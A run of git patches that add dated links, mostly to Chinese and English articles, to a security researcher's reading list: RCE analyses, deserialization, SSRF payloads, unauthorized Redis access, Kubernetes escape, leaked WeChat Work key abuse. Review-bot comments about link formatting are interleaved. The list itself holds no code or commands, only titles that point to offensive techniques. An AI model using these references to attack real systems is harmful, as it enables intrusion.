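Review bot: In PATCH 306, the added 2023/03/17 Spring Boot entry has its link target pasted twice back to back inside the parentheses (`...QTUr9ZiXMWqFu1-yhMICjghttps://mp.weixin.qq.com/s/QTUr9ZiXMWqFu1-yhMICjg`), so the rendered link does not point at the article's URL. Keep a single copy of `https://mp.weixin.qq.com/s/QTUr9ZiXMWqFu1-yhMICjg`. The title reads 如果防护, which may be a typo for 如何防护; check it against the article. The broken line is carried unchanged as context through patches 307 to 309, so it needs its own follow-up fix.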
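Review bot: In PATCH 309, the added 2023/03/24 Flink entry is committed with the full WeChat share URL, including `srcid`, `scene`, `mpshare`, `sharer_sharetime=1679630653991` and `sharer_shareid=33fdea7abe6be586e131951d667ccd06`. The same `sharer_shareid` value is present in the 2023/03/12 and 2023/03/14 entries visible in the surrounding context, so the public Readme ties each of these links to one sharing account. These are share metadata rather than part of the article reference; suggest dropping them before committing, or using the short `https://mp.weixin.qq.com/s/...` form that other entries in this list already use.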
From 9af26cc993bddda3ccc2a202e6f9b0e22d765470 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Mon, 27 Mar 2023 19:54:03 +0800 Subject: [PATCH 311/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index bfe30ae..6a21d12 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -301,3 +301,4 @@ + 2023/03/23 [redis未授权到shiro反序列化](https://xz.aliyun.com/t/11198) 在shiro中不错,可以尝试找其他触发点,基本上在数据库的操作上 + 2023/03/24 [Flink RCE via jar/plan API Endpoint in JDK8](https://mp.weixin.qq.com/s?srcid=0324U8WlT7MpOqTIt0vM2MJD&scene=23&sharer_sharetime=1679630653991&mid=2247495227&sharer_shareid=33fdea7abe6be586e131951d667ccd06&sn=5ab9bcc3d89d57ff9799f88c3363814c&idx=1&__biz=MzkyNDA5NjgyMg%3D%3D&chksm=c1d9ae62f6ae2774dd25902c116f6c24f3e5bbf68836f676c25aac53f2c6b771b4a3823c3e7e&mpshare=1#rd) **hessian的利用** + 2023/03/26 [公开一个macOS命令执行技巧](https://mp.weixin.qq.com/s/GZ5eS_lHiBBb7jHNu6PUgg) **因为自己在使用了** ++ 2023/03/27 [Exploiting memory corruption vulnerabilities on Android](https://blog.oversecured.com/Exploiting-memory-corruption-vulnerabilities-on-Android/) From 282f20b743e8af584e7c6c4f7c045de618cc54a6 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Wed, 29 Mar 2023 00:24:32 +0800 Subject: [PATCH 312/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 6a21d12..d96dcc5 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" 
@@ -302,3 +302,4 @@ + 2023/03/24 [Flink RCE via jar/plan API Endpoint in JDK8](https://mp.weixin.qq.com/s?srcid=0324U8WlT7MpOqTIt0vM2MJD&scene=23&sharer_sharetime=1679630653991&mid=2247495227&sharer_shareid=33fdea7abe6be586e131951d667ccd06&sn=5ab9bcc3d89d57ff9799f88c3363814c&idx=1&__biz=MzkyNDA5NjgyMg%3D%3D&chksm=c1d9ae62f6ae2774dd25902c116f6c24f3e5bbf68836f676c25aac53f2c6b771b4a3823c3e7e&mpshare=1#rd) **hessian的利用** + 2023/03/26 [公开一个macOS命令执行技巧](https://mp.weixin.qq.com/s/GZ5eS_lHiBBb7jHNu6PUgg) **因为自己在使用了** + 2023/03/27 [Exploiting memory corruption vulnerabilities on Android](https://blog.oversecured.com/Exploiting-memory-corruption-vulnerabilities-on-Android/) ++ 2023/03/29 [zeppelin 未授权任意命令执行漏洞复现](https://edu.hetianlab.com/post/94) From 20b5786ca9b869a15db0ec7a4f46909763ac2ac1 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Fri, 31 Mar 2023 18:46:35 +0800 Subject: [PATCH 313/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index d96dcc5..334f5cb 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -303,3 +303,4 @@ + 2023/03/26 [公开一个macOS命令执行技巧](https://mp.weixin.qq.com/s/GZ5eS_lHiBBb7jHNu6PUgg) **因为自己在使用了** + 2023/03/27 [Exploiting memory corruption vulnerabilities on Android](https://blog.oversecured.com/Exploiting-memory-corruption-vulnerabilities-on-Android/) + 2023/03/29 [zeppelin 未授权任意命令执行漏洞复现](https://edu.hetianlab.com/post/94) ++ 2023/03/31 [SQL注入&预编译](https://forum.butian.net/share/1559) From 0cdb50a994eb55971dcaedb1465a83dd0d3d0443 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Fri, 31 Mar 2023 23:50:21 +0800 Subject: [PATCH 314/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) 
diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 334f5cb..fbd35d5 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -303,4 +303,5 @@ + 2023/03/26 [公开一个macOS命令执行技巧](https://mp.weixin.qq.com/s/GZ5eS_lHiBBb7jHNu6PUgg) **因为自己在使用了** + 2023/03/27 [Exploiting memory corruption vulnerabilities on Android](https://blog.oversecured.com/Exploiting-memory-corruption-vulnerabilities-on-Android/) + 2023/03/29 [zeppelin 未授权任意命令执行漏洞复现](https://edu.hetianlab.com/post/94) -+ 2023/03/31 [SQL注入&预编译](https://forum.butian.net/share/1559) ++ 2023/03/31 [SQL注入&预编译](https://forum.butian.net/share/1559) ++ 2023/03/31 [The curl quirk that exposed Burp Suite & Google Chrome](https://portswigger.net/research/the-curl-quirk-that-exposed-burp-suite-amp-google-chrome) **@的问题** From f1466e40c539bf66fbeee93a55d257fa9072de71 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sun, 2 Apr 2023 12:36:47 +0800 Subject: [PATCH 315/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index fbd35d5..20f0e65 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -305,3 +305,4 @@ + 2023/03/29 [zeppelin 未授权任意命令执行漏洞复现](https://edu.hetianlab.com/post/94) + 2023/03/31 [SQL注入&预编译](https://forum.butian.net/share/1559) + 2023/03/31 [The curl quirk that exposed Burp Suite & Google Chrome](https://portswigger.net/research/the-curl-quirk-that-exposed-burp-suite-amp-google-chrome) **@的问题** ++ 2023/04/02 [日志库logback的攻击路径](https://mp.weixin.qq.com/s/OBwxaijYCjnvo8I0OBusug) From 107eef4293456b781659d8cf19b02e8828a481cf Mon Sep 17 00:00:00 2001 
From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sun, 2 Apr 2023 13:52:56 +0800 Subject: [PATCH 316/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 20f0e65..8a312d9 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -306,3 +306,4 @@ + 2023/03/31 [SQL注入&预编译](https://forum.butian.net/share/1559) + 2023/03/31 [The curl quirk that exposed Burp Suite & Google Chrome](https://portswigger.net/research/the-curl-quirk-that-exposed-burp-suite-amp-google-chrome) **@的问题** + 2023/04/02 [日志库logback的攻击路径](https://mp.weixin.qq.com/s/OBwxaijYCjnvo8I0OBusug) ++ 2023/04/03 [SSRF payloads](https://pravinponnusamy.medium.com/ssrf-payloads-f09b2a86a8b4) From a43e1358829651bf2ebb0cf4c5db9a3f9bec5ef8 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sun, 2 Apr 2023 17:08:47 +0800 Subject: [PATCH 317/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 8a312d9..ee9b659 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" 
@@ -306,4 +306,5 @@ + 2023/03/31 [SQL注入&预编译](https://forum.butian.net/share/1559) + 2023/03/31 [The curl quirk that exposed Burp Suite & Google Chrome](https://portswigger.net/research/the-curl-quirk-that-exposed-burp-suite-amp-google-chrome) **@的问题** + 2023/04/02 [日志库logback的攻击路径](https://mp.weixin.qq.com/s/OBwxaijYCjnvo8I0OBusug) -+ 2023/04/03 [SSRF payloads](https://pravinponnusamy.medium.com/ssrf-payloads-f09b2a86a8b4) ++ 2023/04/02 [SSRF payloads](https://pravinponnusamy.medium.com/ssrf-payloads-f09b2a86a8b4) ++ 2023/04/02 [DFA敏感词算法](https://mp.weixin.qq.com/s?__biz=MzU1ODcxNDgyMA==&mid=2247484121&idx=1&sn=2f1f40f73124aca46f6572f5235d945a&chksm=fc231872cb549164a13f5f74ce43201390aaeada5f5f897537c3999af583aac184f1ce81d504&mpshare=1&scene=23&srcid=0402QW1pkeLvwamFjHBi3hvz&sharer_sharetime=1680424676004&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) From 2e42e80cbf7c52818c6e849f70ae62818f16fc6d Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Wed, 12 Apr 2023 21:12:29 +0800 Subject: [PATCH 318/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index ee9b659..e4eb71e 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" 
@@ -308,3 +308,4 @@ + 2023/04/02 [日志库logback的攻击路径](https://mp.weixin.qq.com/s/OBwxaijYCjnvo8I0OBusug) + 2023/04/02 [SSRF payloads](https://pravinponnusamy.medium.com/ssrf-payloads-f09b2a86a8b4) + 2023/04/02 [DFA敏感词算法](https://mp.weixin.qq.com/s?__biz=MzU1ODcxNDgyMA==&mid=2247484121&idx=1&sn=2f1f40f73124aca46f6572f5235d945a&chksm=fc231872cb549164a13f5f74ce43201390aaeada5f5f897537c3999af583aac184f1ce81d504&mpshare=1&scene=23&srcid=0402QW1pkeLvwamFjHBi3hvz&sharer_sharetime=1680424676004&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) ++ 2023/04/12 [java-exploitation-restrictions-in](https://codewhitesec.blogspot.com/2023/04/java-exploitation-restrictions-in.html) From b2830fa50e3777a76560e6c14a0a61a502380553 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sat, 15 Apr 2023 18:12:17 +0800 Subject: [PATCH 319/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index e4eb71e..86fa42c 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -309,3 +309,4 @@ + 2023/04/02 [SSRF payloads](https://pravinponnusamy.medium.com/ssrf-payloads-f09b2a86a8b4) + 2023/04/02 [DFA敏感词算法](https://mp.weixin.qq.com/s?__biz=MzU1ODcxNDgyMA==&mid=2247484121&idx=1&sn=2f1f40f73124aca46f6572f5235d945a&chksm=fc231872cb549164a13f5f74ce43201390aaeada5f5f897537c3999af583aac184f1ce81d504&mpshare=1&scene=23&srcid=0402QW1pkeLvwamFjHBi3hvz&sharer_sharetime=1680424676004&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) + 2023/04/12 [java-exploitation-restrictions-in](https://codewhitesec.blogspot.com/2023/04/java-exploitation-restrictions-in.html) ++ 2023/04/15 [Apache Solr 9.1 RCE 分析 CNVD-2023-27598](https://blog.noah.360.net/apache-solr-rce/) **todo** From 090712fbe5fca9150b86a0cfc07ad8a55fcb8074 Mon Sep 17 00:00:00 2001 
From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Wed, 19 Apr 2023 11:24:37 +0800 Subject: [PATCH 320/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 86fa42c..47b3a2d 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -310,3 +310,4 @@ + 2023/04/02 [DFA敏感词算法](https://mp.weixin.qq.com/s?__biz=MzU1ODcxNDgyMA==&mid=2247484121&idx=1&sn=2f1f40f73124aca46f6572f5235d945a&chksm=fc231872cb549164a13f5f74ce43201390aaeada5f5f897537c3999af583aac184f1ce81d504&mpshare=1&scene=23&srcid=0402QW1pkeLvwamFjHBi3hvz&sharer_sharetime=1680424676004&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) + 2023/04/12 [java-exploitation-restrictions-in](https://codewhitesec.blogspot.com/2023/04/java-exploitation-restrictions-in.html) + 2023/04/15 [Apache Solr 9.1 RCE 分析 CNVD-2023-27598](https://blog.noah.360.net/apache-solr-rce/) **todo** ++ 2023/04/19 [RCE进入内网接管k8s并逃逸进xx网-实战科普教程(一)](https://mp.weixin.qq.com/s?__biz=MzIxNTIzMzM1Ng==&mid=2651106315&idx=1&sn=97e4337a8c5d95952ae44ddf358aa366&chksm=8c6b6a28bb1ce33e57b1985491e7375511a7e87be3a51bce751b94dacec2385a1477c4f89e24&mpshare=1&scene=23&srcid=0419GSbLma7eb91vWCxXAnsM&sharer_sharetime=1681872082937&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **学** From 0be06ea19db6c533e2ba5ee67a05652227ce0e20 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Wed, 31 May 2023 14:38:54 +0800 Subject: [PATCH 321/332] Create readme.md --- shell/Groovy/readme.md | 3 +++ 1 file changed, 3 insertions(+) create mode 100644 shell/Groovy/readme.md diff --git a/shell/Groovy/readme.md b/shell/Groovy/readme.md new file mode 100644 index 0000000..1f20d18 --- /dev/null +++ b/shell/Groovy/readme.md @@ -0,0 +1,3 @@ +Groovy 安全 + +https://xz.aliyun.com/t/10703 
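Review bot: In PATCH 321, the new file is created as `shell/Groovy/readme.md`, while the other directories touched in this series spell it `Readme.md` (`Jetty/Readme.md`, `java日常/Readme.md`); on a case-sensitive checkout these are different names, so pick one spelling for the repository. The only link is a bare URL under the heading `Groovy 安全`, with no title or date, unlike the dated `[title](url)` entries in the java日常 list; adding the article title would let a reader tell what the link covers without opening it.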
From f2a82c2f327caf4848ba9410eb07b0e49f1661c5 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Wed, 31 May 2023 15:16:29 +0800 Subject: [PATCH 322/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 47b3a2d..a960fd2 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -311,3 +311,4 @@ + 2023/04/12 [java-exploitation-restrictions-in](https://codewhitesec.blogspot.com/2023/04/java-exploitation-restrictions-in.html) + 2023/04/15 [Apache Solr 9.1 RCE 分析 CNVD-2023-27598](https://blog.noah.360.net/apache-solr-rce/) **todo** + 2023/04/19 [RCE进入内网接管k8s并逃逸进xx网-实战科普教程(一)](https://mp.weixin.qq.com/s?__biz=MzIxNTIzMzM1Ng==&mid=2651106315&idx=1&sn=97e4337a8c5d95952ae44ddf358aa366&chksm=8c6b6a28bb1ce33e57b1985491e7375511a7e87be3a51bce751b94dacec2385a1477c4f89e24&mpshare=1&scene=23&srcid=0419GSbLma7eb91vWCxXAnsM&sharer_sharetime=1681872082937&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **学** ++ 2023/05/31 [Nacos结合Spring Cloud Gateway RCE利用](https://xz.aliyun.com/t/11493) From ad71815b92bc5c81a674e479e2c35d817c1b96e3 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sat, 3 Jun 2023 17:50:33 +0800 Subject: [PATCH 323/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index a960fd2..dff0eb0 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" 
@@ -312,3 +312,4 @@ + 2023/04/15 [Apache Solr 9.1 RCE 分析 CNVD-2023-27598](https://blog.noah.360.net/apache-solr-rce/) **todo** + 2023/04/19 [RCE进入内网接管k8s并逃逸进xx网-实战科普教程(一)](https://mp.weixin.qq.com/s?__biz=MzIxNTIzMzM1Ng==&mid=2651106315&idx=1&sn=97e4337a8c5d95952ae44ddf358aa366&chksm=8c6b6a28bb1ce33e57b1985491e7375511a7e87be3a51bce751b94dacec2385a1477c4f89e24&mpshare=1&scene=23&srcid=0419GSbLma7eb91vWCxXAnsM&sharer_sharetime=1681872082937&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **学** + 2023/05/31 [Nacos结合Spring Cloud Gateway RCE利用](https://xz.aliyun.com/t/11493) ++ 2023/06/03 [Nevado JMS反序列化审计tips](https://novysodope.github.io/2023/04/01/95/) From 97f575a8c79e5c7f67afed23bced47ac87a00a64 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sat, 3 Jun 2023 18:00:28 +0800 Subject: [PATCH 324/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index dff0eb0..f3df6af 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -313,3 +313,4 @@ + 2023/04/19 [RCE进入内网接管k8s并逃逸进xx网-实战科普教程(一)](https://mp.weixin.qq.com/s?__biz=MzIxNTIzMzM1Ng==&mid=2651106315&idx=1&sn=97e4337a8c5d95952ae44ddf358aa366&chksm=8c6b6a28bb1ce33e57b1985491e7375511a7e87be3a51bce751b94dacec2385a1477c4f89e24&mpshare=1&scene=23&srcid=0419GSbLma7eb91vWCxXAnsM&sharer_sharetime=1681872082937&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **学** + 2023/05/31 [Nacos结合Spring Cloud Gateway RCE利用](https://xz.aliyun.com/t/11493) + 2023/06/03 [Nevado JMS反序列化审计tips](https://novysodope.github.io/2023/04/01/95/) ++ 2023/06/03 [Celery Redis未授权访问利用](https://forum.butian.net/share/224) From 06320d964a19c67ad06305ce6f51a0b33a72bf1c Mon Sep 17 00:00:00 2001 
From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sun, 4 Jun 2023 14:16:47 +0800 Subject: [PATCH 325/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index f3df6af..71e1c71 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -314,3 +314,4 @@ + 2023/05/31 [Nacos结合Spring Cloud Gateway RCE利用](https://xz.aliyun.com/t/11493) + 2023/06/03 [Nevado JMS反序列化审计tips](https://novysodope.github.io/2023/04/01/95/) + 2023/06/03 [Celery Redis未授权访问利用](https://forum.butian.net/share/224) ++ 2023/06/04 [cname记录是什么?他存在的意义是什么?](https://www.zhihu.com/question/22916306) From 059a82feb5048cc0b23f611230a808caeb08ecb7 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Mon, 5 Jun 2023 12:58:53 +0800 Subject: [PATCH 326/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 71e1c71..b0489dc 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -315,3 +315,4 @@ + 2023/06/03 [Nevado JMS反序列化审计tips](https://novysodope.github.io/2023/04/01/95/) + 2023/06/03 [Celery Redis未授权访问利用](https://forum.butian.net/share/224) + 2023/06/04 [cname记录是什么?他存在的意义是什么?](https://www.zhihu.com/question/22916306) ++ 2023/06/05 [ImageMagick 参数注入](https://github.com/ImageMagick/ImageMagick/issues/6338) From 62ea34e74a7a48e93f66684e295caa1c4210de04 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Mon, 5 Jun 2023 22:08:24 +0800 Subject: [PATCH 327/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) 
diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index b0489dc..5352177 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -316,3 +316,4 @@ + 2023/06/03 [Celery Redis未授权访问利用](https://forum.butian.net/share/224) + 2023/06/04 [cname记录是什么?他存在的意义是什么?](https://www.zhihu.com/question/22916306) + 2023/06/05 [ImageMagick 参数注入](https://github.com/ImageMagick/ImageMagick/issues/6338) ++ 2023/06/05 [为什么我们需要收集URL?](https://mp.weixin.qq.com/s/nhU9gbRot3X8D_1AvkirUA) From d481c3578b122a9bb8d7d24a3248889d1078eeef Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Tue, 6 Jun 2023 11:38:22 +0800 Subject: [PATCH 328/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 5352177..a075ebe 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -317,3 +317,4 @@ + 2023/06/04 [cname记录是什么?他存在的意义是什么?](https://www.zhihu.com/question/22916306) + 2023/06/05 [ImageMagick 参数注入](https://github.com/ImageMagick/ImageMagick/issues/6338) + 2023/06/05 [为什么我们需要收集URL?](https://mp.weixin.qq.com/s/nhU9gbRot3X8D_1AvkirUA) ++ 2023/06/06 [justCTF2023-AWS Cognito认证服务的安全隐患](https://hpdoger.cn/2023/06/05/title:%20justCTF2023-AWS%20Cognito%E8%AE%A4%E8%AF%81%E6%9C%8D%E5%8A%A1%E7%9A%84%E5%AE%89%E5%85%A8%E9%9A%90%E6%82%A3/) **学习** From f1260ae49ecb1bda1c91811608fef7c3f5e15e2c Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Fri, 16 Jun 2023 21:25:27 +0800 Subject: [PATCH 329/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) 
diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index a075ebe..b4ac6f6 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -318,3 +318,4 @@ + 2023/06/05 [ImageMagick 参数注入](https://github.com/ImageMagick/ImageMagick/issues/6338) + 2023/06/05 [为什么我们需要收集URL?](https://mp.weixin.qq.com/s/nhU9gbRot3X8D_1AvkirUA) + 2023/06/06 [justCTF2023-AWS Cognito认证服务的安全隐患](https://hpdoger.cn/2023/06/05/title:%20justCTF2023-AWS%20Cognito%E8%AE%A4%E8%AF%81%E6%9C%8D%E5%8A%A1%E7%9A%84%E5%AE%89%E5%85%A8%E9%9A%90%E6%82%A3/) **学习** ++ 2023/06/16 [NGINX缓存原理及源码分析(一)](https://zhuanlan.zhihu.com/p/420983450) From ce6588308a2a340a77849833733c5fe65422f3a5 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Fri, 16 Jun 2023 21:29:01 +0800 Subject: [PATCH 330/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index b4ac6f6..30e3f6b 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -318,4 +318,4 @@ + 2023/06/05 [ImageMagick 参数注入](https://github.com/ImageMagick/ImageMagick/issues/6338) + 2023/06/05 [为什么我们需要收集URL?](https://mp.weixin.qq.com/s/nhU9gbRot3X8D_1AvkirUA) + 2023/06/06 [justCTF2023-AWS Cognito认证服务的安全隐患](https://hpdoger.cn/2023/06/05/title:%20justCTF2023-AWS%20Cognito%E8%AE%A4%E8%AF%81%E6%9C%8D%E5%8A%A1%E7%9A%84%E5%AE%89%E5%85%A8%E9%9A%90%E6%82%A3/) **学习** -+ 2023/06/16 [NGINX缓存原理及源码分析(一)](https://zhuanlan.zhihu.com/p/420983450) ++ 2023/06/16 [NGINX缓存原理及源码分析(一)](https://zhuanlan.zhihu.com/p/420983450) [cdn原理分析-本地搭建cdn模拟访问过程](https://mp.weixin.qq.com/s/u-VWrrdlkRzKs7u04EPV-g) From 3d3b9f1907662f851cf7cd698762795d43368502 Mon Sep 17 00:00:00 2001 
From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sun, 2 Jul 2023 22:34:14 +0800 Subject: [PATCH 331/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 30e3f6b..c6adbcc 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -319,3 +319,4 @@ + 2023/06/05 [为什么我们需要收集URL?](https://mp.weixin.qq.com/s/nhU9gbRot3X8D_1AvkirUA) + 2023/06/06 [justCTF2023-AWS Cognito认证服务的安全隐患](https://hpdoger.cn/2023/06/05/title:%20justCTF2023-AWS%20Cognito%E8%AE%A4%E8%AF%81%E6%9C%8D%E5%8A%A1%E7%9A%84%E5%AE%89%E5%85%A8%E9%9A%90%E6%82%A3/) **学习** + 2023/06/16 [NGINX缓存原理及源码分析(一)](https://zhuanlan.zhihu.com/p/420983450) [cdn原理分析-本地搭建cdn模拟访问过程](https://mp.weixin.qq.com/s/u-VWrrdlkRzKs7u04EPV-g) ++ 2023/07/02 [一种基于规则的 JavaWeb 回显方案](https://mp.weixin.qq.com/s/hIPz0LEk_OW_IpUbfKBYMg) From f66350052c3674c4c090cb24524b0559af905e33 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Tue, 11 Jul 2023 15:47:41 +0800 Subject: [PATCH 332/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index c6adbcc..a8914bd 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" 
@@ -320,3 +320,4 @@ + 2023/06/06 [justCTF2023-AWS Cognito认证服务的安全隐患](https://hpdoger.cn/2023/06/05/title:%20justCTF2023-AWS%20Cognito%E8%AE%A4%E8%AF%81%E6%9C%8D%E5%8A%A1%E7%9A%84%E5%AE%89%E5%85%A8%E9%9A%90%E6%82%A3/) **学习** + 2023/06/16 [NGINX缓存原理及源码分析(一)](https://zhuanlan.zhihu.com/p/420983450) [cdn原理分析-本地搭建cdn模拟访问过程](https://mp.weixin.qq.com/s/u-VWrrdlkRzKs7u04EPV-g) + 2023/07/02 [一种基于规则的 JavaWeb 回显方案](https://mp.weixin.qq.com/s/hIPz0LEk_OW_IpUbfKBYMg) ++ 2023/07/11 [企业微信密钥泄露利用小案例](https://mp.weixin.qq.com/s/mptsykGJHmRC87dYqFFqMw)
